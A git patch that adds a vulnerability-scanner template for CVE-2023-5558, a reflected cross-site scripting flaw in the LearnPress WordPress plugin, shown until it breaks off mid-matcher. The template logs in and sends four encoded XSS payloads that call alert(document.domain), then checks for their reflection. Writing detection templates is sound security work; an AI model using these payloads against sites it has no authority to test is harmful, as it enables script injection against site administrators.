From ffa0fbfa166b2b419dd82127fd4880a3fdbab644 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 22 Oct 2024 13:51:48 +0530
Subject: [PATCH] Create CVE-2023-5558.yaml

---
http/cves/2023/CVE-2023-5558.yaml | 79 +++++++++++++++++++++++++++++++
1 file changed, 79 insertions(+)
create mode 100644 http/cves/2023/CVE-2023-5558.yaml

diff --git a/http/cves/2023/CVE-2023-5558.yaml b/http/cves/2023/CVE-2023-5558.yaml
new file mode 100644
index 0000000000..beaff1f537
--- /dev/null
+++ b/http/cves/2023/CVE-2023-5558.yaml
@@ -0,0 +1,79 @@
+id: CVE-2023-5558
+
+info:
+ name: LearnPress < 4.2.5.5 - Cross-Site Scripting
+ author: ritikchaddha
+ severity: medium
+ description: |
+ The LearnPress WordPress plugin before 4.2.5.5 does not sanitise and escape user input before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
+ impact: |
+ Allows attackers to execute malicious scripts in the context of the victim's browser.
+ remediation: |
+ Update LearnPress WordPress Plugin to the latest version to mitigate the vulnerability.
+ reference:
+ - https://wpscan.com/vulnerability/4efd2a4d-89bd-472f-ba5a-f9944fd4dd16/
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-5558
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2023-5558
+ cwe-id: CWE-79
+ epss-score: 0.00046
+ epss-percentile: 0.15636
+ cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*
+ metadata:
+ max-request: 6
+ vendor: thimpress
+ product: learnpress
+ framework: wordpress
+ tags: cve,cve2023,wp,wp-plugin,wordpress,learnpress,xss,authenticated
+
+http:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: word
+ words:
+ - "/wp-content/plugins/learnpress"
+ internal: true
+
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /{{path}} HTTP/1.1
+ Host: {{Hostname}}
+
+ payloads:
+ path:
+ - '?param=value%22%27%3Balert(document.domain)%3C!--'
+ - '?param=value%22%27%3Balert(document.domain)%3Bb=%27'
+ - '?%27-alert(%60XSS%60)-%27=a'
+ - 'instructors/?param=value%26%23x3C%3B%2Fscript%26%23x3E%3B%26%23x3C%3Bscript%26%23x3E%3Balert%26%23x60%3Bdocument.domain%26%23x60%3B%26%23x3C%3B%2Fscript%26%23x3E%3B%0A'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "\"';alert(document.domain)